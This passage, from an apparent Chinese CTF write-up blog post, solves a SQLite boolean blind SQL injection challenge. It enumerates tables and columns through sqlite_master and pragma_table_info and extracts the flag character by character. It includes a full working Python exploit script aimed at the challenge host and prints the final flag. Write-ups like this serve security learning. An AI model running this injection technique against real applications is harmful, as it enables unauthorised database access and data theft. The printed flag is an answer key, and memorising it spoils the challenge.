\u679a\u4e3e\u8868\u540d<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u901a\u8fc7 <code>limit 1 offset n<\/code> \u9010\u4e2a\u8bfb\u53d6\u8868\u540d\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    select name\n    from sqlite_master\n    where type='table'\n    order by name\n    limit 1 offset 0<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u518d\u4f7f\u7528\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>length((...))<\/code> \u83b7\u53d6\u957f\u5ea6<\/li>\n\n\n\n<li><code>unicode(substr((...), i, 1))<\/code> \u83b7\u53d6\u7b2c <code>i<\/code> \u4e2a\u5b57\u7b26 ASCII\/Unicode \u503c<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8\u5f97\u5230\u8868\u540d\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    organizations\n    partner_invites\n    sqlite_sequence\n    support_tickets\n    workspace_secret_notes<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u770b\u5230 <code>workspace_secret_notes<\/code> \u65f6\uff0c\u57fa\u672c\u5c31\u5df2\u7ecf\u6709\u5473\u9053\u4e86\u3002\u8fd9\u4e2a\u8868\u540d\u672c\u8eab\u5c31\u50cf\u662f\u5728\u8bf4\uff1a<strong>\u79d8\u5bc6\u5728\u8fd9\u91cc\u3002<\/strong><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e94-\u5b57\u6bb5\u679a\u4e3e\">\u4e94\u3001\u5b57\u6bb5\u679a\u4e3e<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e3a\u4e86\u907f\u514d\u76f4\u63a5\u76f2\u731c\u5217\u540d\uff0c\u53ef\u4ee5\u7ee7\u7eed\u5229\u7528 SQLite \u7684\u5143\u4fe1\u606f\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>select count(*) from pragma_table_info('workspace_secret_notes')<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee5\u53ca\uff1a <code>select name from pragma_table_info('workspace_secret_notes') limit 1 offset n<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8\u5f97\u5230\u5b57\u6bb5\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    
id\n    org_id\n    note_key\n    note_value\n    scope\n    rotated_at<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u65f6\u8868\u7ed3\u6784\u5df2\u7ecf\u5341\u5206\u660e\u663e\uff1a\u8fd9\u662f\u4e00\u4e2a <strong>\u952e\u503c\u914d\u7f6e\u8868<\/strong>\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e8e\u662f\u8fdb\u4e00\u6b65\u8bfb\u53d6 <code>note_key<\/code>\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    billing_rollout\n    incident_room\n    flag<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5f53\u7b2c\u4e09\u4e2a\u952e\u540d\u76f4\u63a5\u53eb <code>flag<\/code> \u65f6\uff0c\u8fd9\u9898\u5df2\u7ecf\u8fdb\u5165\u6536\u5c3e\u9636\u6bb5\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u516d-\u63d0\u53d6-flag\">\u516d\u3001\u63d0\u53d6 Flag<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u540e\u8bfb\u53d6\uff1a select note_value from workspace_secret_notes where note_key=&#8217;flag&#8217; limit 1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u540c\u6837\u4f7f\u7528\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>length()<\/code><\/li>\n\n\n\n<li><code>substr()<\/code><\/li>\n\n\n\n<li><code>unicode()<\/code><\/li>\n\n\n\n<li>\u4e8c\u5206\u6cd5<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u9010\u5b57\u7b26\u7206\u7834\u5373\u53ef\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u7ec8\u5f97\u5230\uff1a <code>FLAG{231f273b-3ba1-4345-ba71-0d500c7749ab}<\/code><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u4e03-\u5b8c\u6574\u5229\u7528\u811a\u672c\">\u4e03\u3001\u5b8c\u6574\u5229\u7528\u811a\u672c<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e0b\u9762\u7ed9\u51fa\u4e00\u4efd\u5b9e\u9645\u53ef\u7528\u7684 Python \u811a\u672c\u3002\u8fd9\u4e2a\u811a\u672c\u5305\u542b\uff1a<\/p>\n\n\n\n<ul 
class=\"wp-block-list\">\n<li>\u8bf7\u6c42\u91cd\u8bd5<\/li>\n\n\n\n<li>\u5e03\u5c14\u5224\u65ad<\/li>\n\n\n\n<li>\u6570\u503c\u4e8c\u5206<\/li>\n\n\n\n<li class=\"has-medium-font-size\">\u6587\u672c\u9010\u5b57\u7b26\u8bfb\u53d6<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>import requests\nimport time\nimport random\nfrom requests.adapters import HTTPAdapter\nfrom urllib3.util.retry import Retry BASE = \"http:\/\/8000-28fa6653-0087-4658-ad50-c79137139ddd.challenge.ctfplus.cn\/api\/invite\/check\" sess = requests.Session()\nretry = Retry(\ntotal=5,\nconnect=5,\nread=5,\nbackoff_factor=0.5,\nstatus_forcelist=&#91;429, 500, 502, 503, 504],\nallowed_methods=None,\n)\nsess.mount(\"http:\/\/\", HTTPAdapter(max_retries=retry)) def req(cond: str) -&gt; bool:\npayload = f\\\"' OR ({cond})-- \\\"\nfor attempt in range(8):\ntry:\nr = sess.get(BASE, params={\"code\": payload}, timeout=(15, 20))\nr.raise_for_status()\nreturn bool(r.json().get(\"valid\"))\nexcept Exception:\nif attempt == 7:\nraise\ntime.sleep(0.35 * (attempt + 1) + random.random() * 0.2) def num_equals(expr: str, n: int) -&gt; bool:\nreturn req(f\"({expr})={n}\") def num_gt(expr: str, n: int) -&gt; bool:\nreturn req(f\"({expr})&gt;{n}\") def find_number(expr: str, lo: int = 0, hi: int = 256):\nwhile lo &lt; hi:\nmid = (lo + hi) \/\/ 2\nif num_gt(expr, mid):\nlo = mid + 1\nelse:\nhi = mid\nif num_equals(expr, lo):\nreturn lo\nreturn None def dump_text(expr: str, max_len: int = 200) -&gt; str:\nln = find_number(f\"length(({expr}))\", 0, max_len)\nif ln is None:\nreturn \"\"\nout = &#91;]\nfor i in range(1, ln + 1):\ncode = find_number(f\"unicode(substr(({expr}),{i},1))\", 0, 126)\nout.append(chr(code if code is not None else 63))\nreturn \"\".join(out) if <strong>name<\/strong> == \"<strong>main<\/strong>\":\ntable_count = find_number(\"select count(*) from sqlite_master where type='table'\", 0, 20)\nprint(\"&#91;+] table_count =\", table_count) <code>for i in range(table_count): 
name = dump_text( f\"select name from sqlite_master where type='table' order by name limit 1 offset {i}\", 80, ) print(f\"&#91;+] table&#91;{i}] =\", name) col_count = find_number(\"select count(*) from pragma_table_info('workspace_secret_notes')\", 0, 20) print(\"&#91;+] column_count =\", col_count) for i in range(col_count): col = dump_text( f\"select name from pragma_table_info('workspace_secret_notes') limit 1 offset {i}\", 80, ) print(f\"&#91;+] column&#91;{i}] =\", col) for i in range(3): key = dump_text( f\"select note_key from workspace_secret_notes order by id limit 1 offset {i}\", 80, ) print(f\"&#91;+] key&#91;{i}] =\", key) flag = dump_text( \"select note_value from workspace_secret_notes where note_key='flag' limit 1\", 200, ) print(\"&#91;+] FLAG =\", flag)<\/code><\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li><\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u516b-\u5229\u7528\u903b\u8f91\u56fe\">\u516b\u3001\u5229\u7528\u903b\u8f91\u56fe<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>flowchart TD\n    A&#91;\"\u8bbf\u95ee\u9996\u9875\"] --&gt; B&#91;\"\u67e5\u770b\u524d\u7aef JS\"]\n    B --&gt; C&#91;\"\u53d1\u73b0 \/api\/invite\/check?code=\"]\n    C --&gt; D&#91;\"\u6784\u9020\u771f\u5047 Payload\"]\n    D --&gt; E&#91;\"\u786e\u8ba4 SQLite \u5e03\u5c14\u76f2\u6ce8\"]\n    E --&gt; F&#91;\"\u679a\u4e3e sqlite_master \u8868\u540d\"]\n    F --&gt; G&#91;\"\u5b9a\u4f4d workspace_secret_notes\"]\n    G --&gt; H&#91;\"\u901a\u8fc7 pragma_table_info \u679a\u4e3e\u5b57\u6bb5\"]\n    H --&gt; I&#91;\"\u53d1\u73b0 note_key \/ note_value\"]\n    I --&gt; J&#91;\"\u8bfb\u53d6 note_key\"]\n    J --&gt; K&#91;\"\u53d1\u73b0 key = flag\"]\n    K --&gt; L&#91;\"\u8bfb\u53d6 note_value\"]\n    L --&gt; M&#91;\"\u5f97\u5230\u6700\u7ec8 Flag\"]  <\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" 
id=\"\u4e5d-\u9898\u76ee\u4eae\u70b9\">\u4e5d\u3001\u9898\u76ee\u4eae\u70b9<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u7684\u8bbe\u8ba1\u5176\u5b9e\u5f88\u6f02\u4eae\uff0c\u4e3b\u8981\u6f02\u4eae\u5728\u4e09\u4e2a\u5730\u65b9\uff1a<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"1-\u56de\u663e\u6781\u5c11-\u4f46\u4fe1\u606f\u8db3\u591f\">1. \u56de\u663e\u6781\u5c11\uff0c\u4f46\u4fe1\u606f\u8db3\u591f<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u9875\u9762\u6ca1\u6709\u62a5\u9519\u3001\u6ca1\u6709\u8be6\u7ec6\u63d0\u793a\u3001\u6ca1\u6709\u76f4\u63a5\u6570\u636e\u8f93\u51fa\uff0c\u53ea\u6709\u4e00\u4e2a\u8f7b\u63cf\u6de1\u5199\u7684 <code>valid=true\/false<\/code>\u3002\u4f46\u5bf9\u4e8e\u76f2\u6ce8\u6765\u8bf4\uff0c\u8fd9\u5df2\u7ecf\u8db3\u591f\u6784\u6210\u4e00\u4e2a\u5b8c\u6574\u7684\u4fe1\u606f\u901a\u9053\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"2-\u524d\u7aef\u63a5\u53e3\u662f\u552f\u4e00\u5165\u53e3\">2. \u524d\u7aef\u63a5\u53e3\u662f\u552f\u4e00\u5165\u53e3<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u9898\u76ee\u6ca1\u6709\u628a\u6ce8\u5165\u70b9\u5199\u5728\u660e\u9762\u4e0a\uff0c\u800c\u662f\u8981\u6c42\u9009\u624b\u4ece\u524d\u7aef JS \u53bb\u7406\u89e3\u771f\u5b9e\u7684\u6570\u636e\u6d41\u3002\u8fd9\u4e00\u6b65\u5f88\u63a5\u8fd1\u771f\u5b9e\u4e1a\u52a1\u73af\u5883\u4e2d\u7684\u6f0f\u6d1e\u6316\u6398\u65b9\u5f0f\u3002<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"3-sqlite-\u5229\u7528\u94fe\u7d27\u51d1\">3. 
SQLite \u5229\u7528\u94fe\u7d27\u51d1<\/h5>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ece <code>sqlite_master<\/code> \u5230 <code>pragma_table_info()<\/code>\uff0c\u518d\u5230 <code>substr()<\/code> \/ <code>length()<\/code> \/ <code>unicode()<\/code>\uff0c\u6574\u4e2a\u5229\u7528\u8fc7\u7a0b\u975e\u5e38\u201cSQLite \u5473\u201d\uff0c\u9002\u5408\u4f5c\u4e3a\u4e00\u9898\u9ad8\u8d28\u91cf\u7684\u6570\u636e\u5e93\u76f2\u6ce8\u7ec3\u4e60\u9898\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5341-\u590d\u76d8\u4e0e\u7ecf\u9a8c\">\u5341\u3001\u590d\u76d8\u4e0e\u7ecf\u9a8c<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"\u8fd9\u9898\u6700\u91cd\u8981\u7684\u7ecf\u9a8c\u6709\u4e09\u70b9\">\u8fd9\u9898\u6700\u91cd\u8981\u7684\u7ecf\u9a8c\u6709\u4e09\u70b9<\/h5>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>\u76f2\u6ce8\u4e0d\u4e00\u5b9a\u9700\u8981\u62a5\u9519\u548c\u5ef6\u65f6<\/strong>\u53ea\u8981\u5e94\u7528\u7ed9\u51fa\u7a33\u5b9a\u7684\u771f\u5047\u5dee\u5f02\uff0c\u5c31\u8db3\u591f\u5b8c\u6210\u5229\u7528\u3002<\/li>\n\n\n\n<li><strong>\u524d\u7aef\u4ee3\u7801\u7ecf\u5e38\u662f\u6700\u597d\u7684\u201c\u63a5\u53e3\u6587\u6863\u201d<\/strong>\u5f88\u591a\u65f6\u5019\u540e\u7aef\u85cf\u5f97\u5f88\u6df1\uff0c\u4f46\u524d\u7aef\u4f1a\u4e3b\u52a8\u628a\u63a5\u53e3\u8def\u5f84\u3001\u53c2\u6570\u540d\u3001\u8fd4\u56de\u7ed3\u6784\u4ea4\u4ee3\u6e05\u695a\u3002<\/li>\n\n\n\n<li><strong>\u9047\u5230 SQLite \u65f6\uff0c\u5148\u60f3\u5230 <code>sqlite_master<\/code><\/strong>\u8fd9\u662f\u6700\u81ea\u7136\u3001\u6700\u9ad8\u6548\u7684\u7a81\u7834\u53e3\u3002<\/li>\n<\/ol>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u6700\u7ec8\u7b54\u6848\">\u6700\u7ec8\u7b54\u6848<\/h4>\n\n\n\n<pre 
class=\"wp-block-code\"><code>FLAG{231f273b-3ba1-4345-ba71-0d500c7749ab}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u961f\u540d\uff1a\u7f51\u5b89\u4e0d\u80fd\u5931\u53bb\u4e8c\u680b\uff083\u4e2a25\u5c0f\u767b\u4eec\u7684\u961f\u4f0d\uff09 \u672c\u4eba\u62ff\u4e86\u4e2aMISC\u76841\u4e2a\u4e8c\u8840\uff0c\u4e24\u4e2a\u4e09\u8840\uff0c\u961f\u4f0d\u603b\u6392\u540d\u7b2c\u4e09\u3002\u961f\u53cb\u6253 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1424,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_gspb_post_css":"","footnotes":""},"categories":[9],"tags":[],"class_list":["post-1416","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-misc"],"_links":{"self":[{"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/1416","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/comments?post=1416"}],"version-history":[{"count":11,"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/1416\/revisions"}],"predecessor-version":[{"id":1439,"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/1416\/revisions\/1439"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/media\/1424"}],"wp:attachment":[{"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/media?parent=1416"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/categories?post=1416"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/tags?post=1416"}],"curies":[{"name":"
wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}